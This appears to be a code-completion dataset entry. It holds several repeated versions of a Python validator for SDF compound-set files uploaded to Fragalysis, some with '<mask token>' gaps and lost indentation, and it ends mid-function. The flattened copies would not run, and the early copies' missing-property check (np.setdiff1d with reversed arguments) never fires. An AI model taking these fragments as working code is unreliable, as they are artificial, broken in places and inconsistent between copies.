validate_dict = add_warning(molecule_name='File error', field=
'compound set', warning_string=
'a compound set with the auto_generated name ' + query[0].
submitter.unique_name +
' already exists (change method name in blank mol method field)',
validate_dict=validate_dict)
return validate_dict
<mask token>
def check_SMILES(mol, validate_dict):
"""
Checks if SMILES can be read by rdkit
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
smi_check = mol.GetProp('original SMILES')
m = Chem.MolFromSmiles(smi_check, sanitize=False)
if m is None:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='original SMILES', warning_string='invalid SMILES %s' % (
smi_check,), validate_dict=validate_dict)
return validate_dict
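# Editor's sketch: what the rdkit round-trip in check_SMILES catches. Uses the
# same Chem import as the module above; the default (sanitizing) parse is shown.
def _demo_smiles_parse():
    assert Chem.MolFromSmiles('C1CC1') is not None  # cyclopropane, parses
    assert Chem.MolFromSmiles('C1CC') is None       # unclosed ring, returns None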
def check_ver_name(blank_mol, version, validate_dict):
"""
Checks if blank mol:
The name (title line) of this molecule should be the
file format specification version e.g. ver_1.0 (as defined in this document)
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
ver_name = blank_mol.GetProp('_Name')
if ver_name != version:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'
), field='_Name', warning_string=
'illegal version: %s found. Should be %s' % (ver_name, version),
validate_dict=validate_dict)
return validate_dict
def check_blank_mol_props(mol, validate_dict):
fields = ['ref_url', 'submitter_name', 'submitter_email',
'submitter_institution', 'generation_date', 'method']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def check_blank_prop(blank_mol, validate_dict):
"""
Checks if blank mol properties have a description
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
property_dict = blank_mol.GetPropsAsDict()
prop_ignore_list = ['ref_mols', 'ref_pdb']
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key not in prop_ignore_list:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'description for %s missing' % (key,), validate_dict=
validate_dict)
if key == 'ref_url' and check_url(value) == False:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'illegal URL %s provided' % (value,), validate_dict=
validate_dict)
return validate_dict
<mask token>
def check_url(value):
"""
Checks if url provided exists. No internet connection required.
Checks URL using Validators package
:value: value associated with 'ref_url' key
:return: False if URL can not be validated
"""
valid = validators.url(value)
if valid != True:
return False
def check_name_characters(name, validate_dict):
legal_non_alnum = ['-', '_', '.']
for char in name:
if not char.isalnum() and char not in legal_non_alnum:
validate_dict = add_warning(molecule_name=name, field='_Name',
warning_string='illegal character %s found' % (char,),
validate_dict=validate_dict)
return validate_dict
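# Editor's sketch: the name check above flags any character that is neither
# alphanumeric nor one of '-', '_', '.'.
def _demo_name_check():
    d = {'molecule_name': [], 'field': [], 'warning_string': []}
    d = check_name_characters('mol 1!', d)  # space and '!' are both illegal
    return d['warning_string']              # -> two warnings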
def missing_field_check(mol, field, validate_dict):
props_dict = mol.GetPropsAsDict()
if not field in props_dict.keys():
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=field, warning_string='%s field not found!' % (field,),
validate_dict=validate_dict)
return validate_dict
<mask token>
def validate(sdf_file, target=None, zfile=None):
validated = True
validate_dict = {'molecule_name': [], 'field': [], 'warning_string': []}
validate_dict = check_sdf(sdf_file, validate_dict)
suppl = Chem.SDMolSupplier(sdf_file)
print('%d mols detected (including blank mol)' % (len(suppl),))
blank_mol = suppl[0]
if blank_mol is None:
validate_dict = add_warning(molecule_name='Blank Mol', field='N/A',
warning_string=
'your blank molecule could not be read by rdkit. The molecule must have at least one atom! No other checks were done'
, validate_dict=validate_dict)
validated = False
return validate_dict, validated
validate_dict = check_compound_set(blank_mol, validate_dict)
other_mols = []
for i in range(1, len(suppl)):
other_mols.append(suppl[i])
all_props = []
for mol in suppl:
all_props.extend([key for key in mol.GetPropsAsDict().keys()])
unique_props = list(set(all_props))
for mol in suppl:
props = [key for key in mol.GetPropsAsDict().keys()]
diff_list = np.setdiff1d(props, unique_props)
for diff in diff_list:
add_warning(molecule_name=mol.GetProp('_Name'), field=
'property (missing)', warning_string=
'%s property is missing from this molecule' % (diff,),
validate_dict=validate_dict)
validate_dict = check_ver_name(blank_mol, version, validate_dict)
validate_dict = check_blank_mol_props(blank_mol, validate_dict)
validate_dict = check_blank_prop(blank_mol, validate_dict)
for m in other_mols:
validate_dict = check_mol_props(m, validate_dict)
validate_dict = check_name_characters(m.GetProp('_Name'), validate_dict
)
validate_dict = check_pdb(m, validate_dict, target, zfile)
validate_dict = check_refmol(m, validate_dict, target)
validate_dict = check_field_populated(m, validate_dict)
validate_dict = check_SMILES(m, validate_dict)
if len(validate_dict['molecule_name']) != 0:
validated = False
return validate_dict, validated
| <mask token>
def check_compound_set(description_mol, validate_dict):
y_m_d = description_mol.GetProp('generation_date').split('-')
submitter_dict = {'submitter__name': description_mol.GetProp(
'submitter_name'), 'submitter__email': description_mol.GetProp(
'submitter_email'), 'submitter__institution': description_mol.
GetProp('submitter_institution'), 'submitter__generation_date':
datetime.date(int(y_m_d[0]), int(y_m_d[1]), int(y_m_d[2])),
'submitter__method': description_mol.GetProp('method')}
query = CompoundSet.objects.filter(**submitter_dict)
if len(query) != 0:
validate_dict = add_warning(molecule_name='File error', field=
'compound set', warning_string=
'a compound set with the auto_generated name ' + query[0].
submitter.unique_name +
' already exists (change method name in blank mol method field)',
validate_dict=validate_dict)
return validate_dict
<mask token>
def check_refmol(mol, validate_dict, target=None):
if target:
refmols = mol.GetProp('ref_mols').split(',')
for ref in refmols:
query = Protein.objects.filter(code__contains=target + '-' +
ref.strip())
if len(query) == 0:
validate_dict = add_warning(molecule_name=mol.GetProp(
'_Name'), field='ref_mol', warning_string=
'molecule for ' + str(ref.strip()) +
' does not exist in fragalysis (make sure the code is exactly as it appears in fragalysis - e.g. x0123_0)'
, validate_dict=validate_dict)
return validate_dict
<mask token>
def check_SMILES(mol, validate_dict):
"""
Checks if SMILES can be read by rdkit
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
smi_check = mol.GetProp('original SMILES')
m = Chem.MolFromSmiles(smi_check, sanitize=False)
if m is None:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='original SMILES', warning_string='invalid SMILES %s' % (
smi_check,), validate_dict=validate_dict)
return validate_dict
def check_ver_name(blank_mol, version, validate_dict):
"""
Checks if blank mol:
The name (title line) of this molecule should be the
file format specification version e.g. ver_1.0 (as defined in this document)
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
ver_name = blank_mol.GetProp('_Name')
if ver_name != version:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'
), field='_Name', warning_string=
'illegal version: %s found. Should be %s' % (ver_name, version),
validate_dict=validate_dict)
return validate_dict
def check_blank_mol_props(mol, validate_dict):
fields = ['ref_url', 'submitter_name', 'submitter_email',
'submitter_institution', 'generation_date', 'method']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def check_blank_prop(blank_mol, validate_dict):
"""
Checks if blank mol properties have a description
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
property_dict = blank_mol.GetPropsAsDict()
prop_ignore_list = ['ref_mols', 'ref_pdb']
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key not in prop_ignore_list:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'description for %s missing' % (key,), validate_dict=
validate_dict)
if key == 'ref_url' and check_url(value) == False:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'illegal URL %s provided' % (value,), validate_dict=
validate_dict)
return validate_dict
<mask token>
def check_url(value):
"""
Checks if url provided exists. No internet connection required.
Checks URL using Validators package
:value: value associated with 'ref_url' key
:return: False if URL can not be validated
"""
valid = validators.url(value)
if valid != True:
return False
def check_name_characters(name, validate_dict):
legal_non_alnum = ['-', '_', '.']
for char in name:
if not char.isalnum() and char not in legal_non_alnum:
validate_dict = add_warning(molecule_name=name, field='_Name',
warning_string='illegal character %s found' % (char,),
validate_dict=validate_dict)
return validate_dict
def missing_field_check(mol, field, validate_dict):
props_dict = mol.GetPropsAsDict()
if not field in props_dict.keys():
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=field, warning_string='%s field not found!' % (field,),
validate_dict=validate_dict)
return validate_dict
<mask token>
def validate(sdf_file, target=None, zfile=None):
validated = True
validate_dict = {'molecule_name': [], 'field': [], 'warning_string': []}
validate_dict = check_sdf(sdf_file, validate_dict)
suppl = Chem.SDMolSupplier(sdf_file)
print('%d mols detected (including blank mol)' % (len(suppl),))
blank_mol = suppl[0]
if blank_mol is None:
validate_dict = add_warning(molecule_name='Blank Mol', field='N/A',
warning_string=
'your blank molecule could not be read by rdkit. The molecule must have at least one atom! No other checks were done'
, validate_dict=validate_dict)
validated = False
return validate_dict, validated
validate_dict = check_compound_set(blank_mol, validate_dict)
other_mols = []
for i in range(1, len(suppl)):
other_mols.append(suppl[i])
all_props = []
for mol in suppl:
all_props.extend([key for key in mol.GetPropsAsDict().keys()])
unique_props = list(set(all_props))
for mol in suppl:
props = [key for key in mol.GetPropsAsDict().keys()]
diff_list = np.setdiff1d(props, unique_props)
for diff in diff_list:
add_warning(molecule_name=mol.GetProp('_Name'), field=
'property (missing)', warning_string=
'%s property is missing from this molecule' % (diff,),
validate_dict=validate_dict)
validate_dict = check_ver_name(blank_mol, version, validate_dict)
validate_dict = check_blank_mol_props(blank_mol, validate_dict)
validate_dict = check_blank_prop(blank_mol, validate_dict)
for m in other_mols:
validate_dict = check_mol_props(m, validate_dict)
validate_dict = check_name_characters(m.GetProp('_Name'), validate_dict
)
validate_dict = check_pdb(m, validate_dict, target, zfile)
validate_dict = check_refmol(m, validate_dict, target)
validate_dict = check_field_populated(m, validate_dict)
validate_dict = check_SMILES(m, validate_dict)
if len(validate_dict['molecule_name']) != 0:
validated = False
return validate_dict, validated
| <mask token>
def check_compound_set(description_mol, validate_dict):
y_m_d = description_mol.GetProp('generation_date').split('-')
submitter_dict = {'submitter__name': description_mol.GetProp(
'submitter_name'), 'submitter__email': description_mol.GetProp(
'submitter_email'), 'submitter__institution': description_mol.
GetProp('submitter_institution'), 'submitter__generation_date':
datetime.date(int(y_m_d[0]), int(y_m_d[1]), int(y_m_d[2])),
'submitter__method': description_mol.GetProp('method')}
query = CompoundSet.objects.filter(**submitter_dict)
if len(query) != 0:
validate_dict = add_warning(molecule_name='File error', field=
'compound set', warning_string=
'a compound set with the auto_generated name ' + query[0].
submitter.unique_name +
' already exists (change method name in blank mol method field)',
validate_dict=validate_dict)
return validate_dict
def add_warning(molecule_name, field, warning_string, validate_dict):
validate_dict['molecule_name'].append(molecule_name)
validate_dict['field'].append(field)
validate_dict['warning_string'].append(warning_string)
return validate_dict
<mask token>
def check_refmol(mol, validate_dict, target=None):
if target:
refmols = mol.GetProp('ref_mols').split(',')
for ref in refmols:
query = Protein.objects.filter(code__contains=target + '-' +
ref.strip())
if len(query) == 0:
validate_dict = add_warning(molecule_name=mol.GetProp(
'_Name'), field='ref_mol', warning_string=
'molecule for ' + str(ref.strip()) +
' does not exist in fragalysis (make sure the code is exactly as it appears in fragalysis - e.g. x0123_0)'
, validate_dict=validate_dict)
return validate_dict
def check_pdb(mol, validate_dict, target=None, zfile=None):
"""
Checks if .pdb file can be read
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
    test_fp = mol.GetProp('ref_pdb')
    if zfile:
        pdb_option = mol.GetProp('ref_pdb')
        if pdb_option not in zfile['zf_list']:
            validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
                field='ref_pdb', warning_string='path ' + str(pdb_option) +
                " can't be found in uploaded zip file (list: " + str(
                zfile['zf_list']) + ')', validate_dict=validate_dict)
if target and not test_fp.endswith('.pdb'):
query = Protein.objects.filter(code__contains=str(target + '-' +
test_fp))
if len(query) == 0:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='ref_pdb', warning_string='pdb for ' + str(test_fp) +
' does not exist in fragalysis', validate_dict=validate_dict)
return validate_dict
def check_SMILES(mol, validate_dict):
"""
Checks if SMILES can be read by rdkit
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
smi_check = mol.GetProp('original SMILES')
m = Chem.MolFromSmiles(smi_check, sanitize=False)
if m is None:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='original SMILES', warning_string='invalid SMILES %s' % (
smi_check,), validate_dict=validate_dict)
return validate_dict
def check_ver_name(blank_mol, version, validate_dict):
"""
Checks if blank mol:
The name (title line) of this molecule should be the
file format specification version e.g. ver_1.0 (as defined in this document)
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
ver_name = blank_mol.GetProp('_Name')
if ver_name != version:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'
), field='_Name', warning_string=
'illegal version: %s found. Should be %s' % (ver_name, version),
validate_dict=validate_dict)
return validate_dict
def check_blank_mol_props(mol, validate_dict):
fields = ['ref_url', 'submitter_name', 'submitter_email',
'submitter_institution', 'generation_date', 'method']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def check_blank_prop(blank_mol, validate_dict):
"""
Checks if blank mol properties have a description
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
property_dict = blank_mol.GetPropsAsDict()
prop_ignore_list = ['ref_mols', 'ref_pdb']
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key not in prop_ignore_list:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'description for %s missing' % (key,), validate_dict=
validate_dict)
if key == 'ref_url' and check_url(value) == False:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'illegal URL %s provided' % (value,), validate_dict=
validate_dict)
return validate_dict
def check_field_populated(mol, validate_dict):
"""
Checks if all compulsory fields are populated:
1. ref_mols - a comma separated list of the fragments
2. ref_pdb - either (a) a filepath (relative to the sdf file)
to an uploaded pdb file
3. original SMILES - the original smiles of the compound
before any computation was carried out
:mol: rdkit mol other than blank_mol
:return: Updates validate dictionary with pass/fail message
"""
compulsory_fields = ['ref_pdb', 'ref_mols', 'original SMILES']
property_dict = mol.GetPropsAsDict()
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key in compulsory_fields:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=key, warning_string='value for %s missing' % (key,),
validate_dict=validate_dict)
return validate_dict
def check_url(value):
"""
Checks if url provided exists. No internet connection required.
Checks URL using Validators package
:value: value associated with 'ref_url' key
:return: False if URL can not be validated
"""
valid = validators.url(value)
if valid != True:
return False
def check_name_characters(name, validate_dict):
legal_non_alnum = ['-', '_', '.']
for char in name:
if not char.isalnum() and char not in legal_non_alnum:
validate_dict = add_warning(molecule_name=name, field='_Name',
warning_string='illegal character %s found' % (char,),
validate_dict=validate_dict)
return validate_dict
def missing_field_check(mol, field, validate_dict):
props_dict = mol.GetPropsAsDict()
if not field in props_dict.keys():
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=field, warning_string='%s field not found!' % (field,),
validate_dict=validate_dict)
return validate_dict
def check_mol_props(mol, validate_dict):
fields = ['ref_pdb', 'ref_mols', 'original SMILES']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def validate(sdf_file, target=None, zfile=None):
validated = True
validate_dict = {'molecule_name': [], 'field': [], 'warning_string': []}
validate_dict = check_sdf(sdf_file, validate_dict)
suppl = Chem.SDMolSupplier(sdf_file)
print('%d mols detected (including blank mol)' % (len(suppl),))
blank_mol = suppl[0]
if blank_mol is None:
validate_dict = add_warning(molecule_name='Blank Mol', field='N/A',
warning_string=
'your blank molecule could not be read by rdkit. The molecule must have at least one atom! No other checks were done'
, validate_dict=validate_dict)
validated = False
return validate_dict, validated
validate_dict = check_compound_set(blank_mol, validate_dict)
other_mols = []
for i in range(1, len(suppl)):
other_mols.append(suppl[i])
all_props = []
for mol in suppl:
all_props.extend([key for key in mol.GetPropsAsDict().keys()])
unique_props = list(set(all_props))
for mol in suppl:
props = [key for key in mol.GetPropsAsDict().keys()]
diff_list = np.setdiff1d(props, unique_props)
for diff in diff_list:
add_warning(molecule_name=mol.GetProp('_Name'), field=
'property (missing)', warning_string=
'%s property is missing from this molecule' % (diff,),
validate_dict=validate_dict)
validate_dict = check_ver_name(blank_mol, version, validate_dict)
validate_dict = check_blank_mol_props(blank_mol, validate_dict)
validate_dict = check_blank_prop(blank_mol, validate_dict)
for m in other_mols:
validate_dict = check_mol_props(m, validate_dict)
validate_dict = check_name_characters(m.GetProp('_Name'), validate_dict
)
validate_dict = check_pdb(m, validate_dict, target, zfile)
validate_dict = check_refmol(m, validate_dict, target)
validate_dict = check_field_populated(m, validate_dict)
validate_dict = check_SMILES(m, validate_dict)
if len(validate_dict['molecule_name']) != 0:
validated = False
return validate_dict, validated
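# Editor's sketch (hypothetical file and target names): driving the full check.
def _demo_validate():
    issues, ok = validate('compound-set_example.sdf', target='Mpro')
    if not ok:
        for name, field, warning in zip(issues['molecule_name'],
                                        issues['field'],
                                        issues['warning_string']):
            print(name, field, warning)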
| <mask token>
version = 'ver_1.2'
def check_compound_set(description_mol, validate_dict):
y_m_d = description_mol.GetProp('generation_date').split('-')
submitter_dict = {'submitter__name': description_mol.GetProp(
'submitter_name'), 'submitter__email': description_mol.GetProp(
'submitter_email'), 'submitter__institution': description_mol.
GetProp('submitter_institution'), 'submitter__generation_date':
datetime.date(int(y_m_d[0]), int(y_m_d[1]), int(y_m_d[2])),
'submitter__method': description_mol.GetProp('method')}
query = CompoundSet.objects.filter(**submitter_dict)
if len(query) != 0:
validate_dict = add_warning(molecule_name='File error', field=
'compound set', warning_string=
'a compound set with the auto_generated name ' + query[0].
submitter.unique_name +
' already exists (change method name in blank mol method field)',
validate_dict=validate_dict)
return validate_dict
def add_warning(molecule_name, field, warning_string, validate_dict):
validate_dict['molecule_name'].append(molecule_name)
validate_dict['field'].append(field)
validate_dict['warning_string'].append(warning_string)
return validate_dict
def check_sdf(sdf_file, validate_dict):
"""
Checks if .sdf file can be read and follows naming format:
'compound-set_<name>.sdf' with <name> replaced with
the name you wish to give it. e.g. compound-set_fragmenstein.sdf
:sdf_file: is the sdf in the specified format
:return: Updates validate dictionary with pass/fail message
"""
    if not (sdf_file.startswith('compound-set_') and sdf_file.endswith('.sdf')):
validate_dict = add_warning(molecule_name='File error', field=
'_File_name', warning_string='illegal filename: ' + str(
sdf_file) + ' found', validate_dict=validate_dict)
return validate_dict
def check_refmol(mol, validate_dict, target=None):
if target:
refmols = mol.GetProp('ref_mols').split(',')
for ref in refmols:
query = Protein.objects.filter(code__contains=target + '-' +
ref.strip())
if len(query) == 0:
validate_dict = add_warning(molecule_name=mol.GetProp(
'_Name'), field='ref_mol', warning_string=
'molecule for ' + str(ref.strip()) +
' does not exist in fragalysis (make sure the code is exactly as it appears in fragalysis - e.g. x0123_0)'
, validate_dict=validate_dict)
return validate_dict
def check_pdb(mol, validate_dict, target=None, zfile=None):
"""
Checks if .pdb file can be read
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
    test_fp = mol.GetProp('ref_pdb')
    if zfile:
        pdb_option = mol.GetProp('ref_pdb')
        if pdb_option not in zfile['zf_list']:
            validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
                field='ref_pdb', warning_string='path ' + str(pdb_option) +
                " can't be found in uploaded zip file (list: " + str(
                zfile['zf_list']) + ')', validate_dict=validate_dict)
if target and not test_fp.endswith('.pdb'):
query = Protein.objects.filter(code__contains=str(target + '-' +
test_fp))
if len(query) == 0:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='ref_pdb', warning_string='pdb for ' + str(test_fp) +
' does not exist in fragalysis', validate_dict=validate_dict)
return validate_dict
def check_SMILES(mol, validate_dict):
"""
Checks if SMILES can be read by rdkit
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
smi_check = mol.GetProp('original SMILES')
m = Chem.MolFromSmiles(smi_check, sanitize=False)
if m is None:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='original SMILES', warning_string='invalid SMILES %s' % (
smi_check,), validate_dict=validate_dict)
return validate_dict
def check_ver_name(blank_mol, version, validate_dict):
"""
Checks if blank mol:
The name (title line) of this molecule should be the
file format specification version e.g. ver_1.0 (as defined in this document)
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
ver_name = blank_mol.GetProp('_Name')
if ver_name != version:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'
), field='_Name', warning_string=
'illegal version: %s found. Should be %s' % (ver_name, version),
validate_dict=validate_dict)
return validate_dict
def check_blank_mol_props(mol, validate_dict):
fields = ['ref_url', 'submitter_name', 'submitter_email',
'submitter_institution', 'generation_date', 'method']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def check_blank_prop(blank_mol, validate_dict):
"""
Checks if blank mol properties have a description
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
property_dict = blank_mol.GetPropsAsDict()
prop_ignore_list = ['ref_mols', 'ref_pdb']
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key not in prop_ignore_list:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'description for %s missing' % (key,), validate_dict=
validate_dict)
if key == 'ref_url' and check_url(value) == False:
validate_dict = add_warning(molecule_name=blank_mol.GetProp(
'_Name'), field=key, warning_string=
'illegal URL %s provided' % (value,), validate_dict=
validate_dict)
return validate_dict
def check_field_populated(mol, validate_dict):
"""
Checks if all compulsory fields are populated:
1. ref_mols - a comma separated list of the fragments
2. ref_pdb - either (a) a filepath (relative to the sdf file)
to an uploaded pdb file
3. original SMILES - the original smiles of the compound
before any computation was carried out
:mol: rdkit mol other than blank_mol
:return: Updates validate dictionary with pass/fail message
"""
compulsory_fields = ['ref_pdb', 'ref_mols', 'original SMILES']
property_dict = mol.GetPropsAsDict()
for key, value in zip(property_dict.keys(), property_dict.values()):
if value == '' and key in compulsory_fields:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=key, warning_string='value for %s missing' % (key,),
validate_dict=validate_dict)
return validate_dict
def check_url(value):
"""
    Checks if the URL provided is well-formed. No internet connection required.
    Checks URL using the Validators package
    :value: value associated with 'ref_url' key
    :return: False if URL cannot be validated
"""
valid = validators.url(value)
if valid != True:
return False
def check_name_characters(name, validate_dict):
legal_non_alnum = ['-', '_', '.']
for char in name:
if not char.isalnum() and char not in legal_non_alnum:
validate_dict = add_warning(molecule_name=name, field='_Name',
warning_string='illegal character %s found' % (char,),
validate_dict=validate_dict)
return validate_dict
def missing_field_check(mol, field, validate_dict):
props_dict = mol.GetPropsAsDict()
if not field in props_dict.keys():
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field=field, warning_string='%s field not found!' % (field,),
validate_dict=validate_dict)
return validate_dict
def check_mol_props(mol, validate_dict):
fields = ['ref_pdb', 'ref_mols', 'original SMILES']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def validate(sdf_file, target=None, zfile=None):
validated = True
validate_dict = {'molecule_name': [], 'field': [], 'warning_string': []}
validate_dict = check_sdf(sdf_file, validate_dict)
suppl = Chem.SDMolSupplier(sdf_file)
print('%d mols detected (including blank mol)' % (len(suppl),))
blank_mol = suppl[0]
if blank_mol is None:
validate_dict = add_warning(molecule_name='Blank Mol', field='N/A',
warning_string=
'your blank molecule could not be read by rdkit. The molecule must have at least one atom! No other checks were done'
, validate_dict=validate_dict)
validated = False
return validate_dict, validated
validate_dict = check_compound_set(blank_mol, validate_dict)
other_mols = []
for i in range(1, len(suppl)):
other_mols.append(suppl[i])
all_props = []
for mol in suppl:
all_props.extend([key for key in mol.GetPropsAsDict().keys()])
unique_props = list(set(all_props))
for mol in suppl:
props = [key for key in mol.GetPropsAsDict().keys()]
        diff_list = np.setdiff1d(unique_props, props)
for diff in diff_list:
add_warning(molecule_name=mol.GetProp('_Name'), field=
'property (missing)', warning_string=
'%s property is missing from this molecule' % (diff,),
validate_dict=validate_dict)
validate_dict = check_ver_name(blank_mol, version, validate_dict)
validate_dict = check_blank_mol_props(blank_mol, validate_dict)
validate_dict = check_blank_prop(blank_mol, validate_dict)
for m in other_mols:
validate_dict = check_mol_props(m, validate_dict)
validate_dict = check_name_characters(m.GetProp('_Name'), validate_dict
)
validate_dict = check_pdb(m, validate_dict, target, zfile)
validate_dict = check_refmol(m, validate_dict, target)
validate_dict = check_field_populated(m, validate_dict)
validate_dict = check_SMILES(m, validate_dict)
if len(validate_dict['molecule_name']) != 0:
validated = False
return validate_dict, validated
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 22 13:19:51 2020
@author: Warren
Script to check sdf file format for Fragalysis upload
"""
from rdkit import Chem
import validators
import numpy as np
import os
from viewer.models import Protein, CompoundSet
import datetime
# Set .sdf format version here
version = 'ver_1.2'
def check_compound_set(description_mol, validate_dict):
y_m_d = description_mol.GetProp('generation_date').split('-')
submitter_dict = {'submitter__name': description_mol.GetProp('submitter_name'),
'submitter__email': description_mol.GetProp('submitter_email'),
'submitter__institution': description_mol.GetProp('submitter_institution'),
'submitter__generation_date': datetime.date(int(y_m_d[0]), int(y_m_d[1]), int(y_m_d[2])),
'submitter__method': description_mol.GetProp('method')}
query = CompoundSet.objects.filter(**submitter_dict)
if len(query)!=0:
validate_dict = add_warning(molecule_name='File error',
field='compound set',
warning_string="a compound set with the auto_generated name " + query[0].submitter.unique_name + " already exists (change method name in blank mol method field)",
validate_dict=validate_dict)
return validate_dict
def add_warning(molecule_name, field, warning_string, validate_dict):
validate_dict['molecule_name'].append(molecule_name)
validate_dict['field'].append(field)
validate_dict['warning_string'].append(warning_string)
return validate_dict
def check_sdf(sdf_file, validate_dict):
"""
Checks if .sdf file can be read and follows naming format:
'compound-set_<name>.sdf' with <name> replaced with
the name you wish to give it. e.g. compound-set_fragmenstein.sdf
:sdf_file: is the sdf in the specified format
:return: Updates validate dictionary with pass/fail message
"""
# Check filename
    if not (sdf_file.startswith("compound-set_") and sdf_file.endswith(".sdf")):
validate_dict = add_warning(molecule_name='File error',
field='_File_name',
warning_string="illegal filename: " + str(sdf_file) + " found",
validate_dict=validate_dict)
return validate_dict
def check_refmol(mol, validate_dict, target=None):
if target:
refmols = mol.GetProp('ref_mols').split(',')
for ref in refmols:
query = Protein.objects.filter(code__contains=target + '-' + ref.strip())
if len(query)==0:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='ref_mol',
warning_string="molecule for " + str(ref.strip()) + " does not exist in fragalysis (make sure the code is exactly as it appears in fragalysis - e.g. x0123_0)",
validate_dict=validate_dict)
return validate_dict
def check_pdb(mol, validate_dict, target=None, zfile=None):
"""
Checks if .pdb file can be read
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
# Check if pdb filepath given and exists
test_fp = mol.GetProp('ref_pdb')
# {'zip_obj': zf, 'zf_list': zip_names}
    if zfile:
        pdb_option = mol.GetProp('ref_pdb')
        # name = pdb_option.split('/')[-1]
        if pdb_option not in zfile['zf_list']:
            validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
                                        field='ref_pdb',
                                        warning_string="path " + str(pdb_option) + " can't be found in uploaded zip file (list: " + str(zfile['zf_list']) + ")",
                                        validate_dict=validate_dict)
# else:
if target and not test_fp.endswith(".pdb"):
query = Protein.objects.filter(code__contains=str(target + '-' + test_fp))
if len(query)==0:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='ref_pdb',
warning_string="pdb for " + str(test_fp) + " does not exist in fragalysis",
validate_dict=validate_dict)
return validate_dict
def check_SMILES(mol, validate_dict):
"""
Checks if SMILES can be read by rdkit
:mol: rdkit mol read from SD file
:return: Updates validate dictionary with pass/fail message
"""
# Check SMILES
smi_check = mol.GetProp('original SMILES')
m = Chem.MolFromSmiles(smi_check, sanitize=False)
if m is None:
validate_dict = add_warning(molecule_name=mol.GetProp('_Name'),
field='original SMILES',
warning_string="invalid SMILES %s" % (smi_check,),
validate_dict=validate_dict)
return validate_dict
def check_ver_name(blank_mol, version, validate_dict):
"""
Checks if blank mol:
The name (title line) of this molecule should be the
file format specification version e.g. ver_1.0 (as defined in this document)
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
ver_name = blank_mol.GetProp('_Name')
if ver_name != version:
validate_dict = add_warning(molecule_name=blank_mol.GetProp('_Name'),
field='_Name',
warning_string='illegal version: %s found. Should be %s' % (ver_name, version),
validate_dict=validate_dict)
return validate_dict
def check_blank_mol_props(mol, validate_dict):
# check for compulsory fields in blank mols
fields = ['ref_url', 'submitter_name', 'submitter_email', 'submitter_institution', 'generation_date', 'method']
for field in fields:
validate_dict = missing_field_check(mol, field, validate_dict)
return validate_dict
def check_blank_prop(blank_mol, validate_dict):
"""
Checks if blank mol properties have a description
:blank_mol: rdkit mol of blank mol from an SD file
:return: Updates validate dictionary with pass/fail message
"""
# Check if properties populated
property_dict = blank_mol.GetPropsAsDict()
# Properties to ignore
prop_ignore_list = ['ref_mols', 'ref_pdb']
for key, value in zip(property_dict.keys(), property_dict.values()):
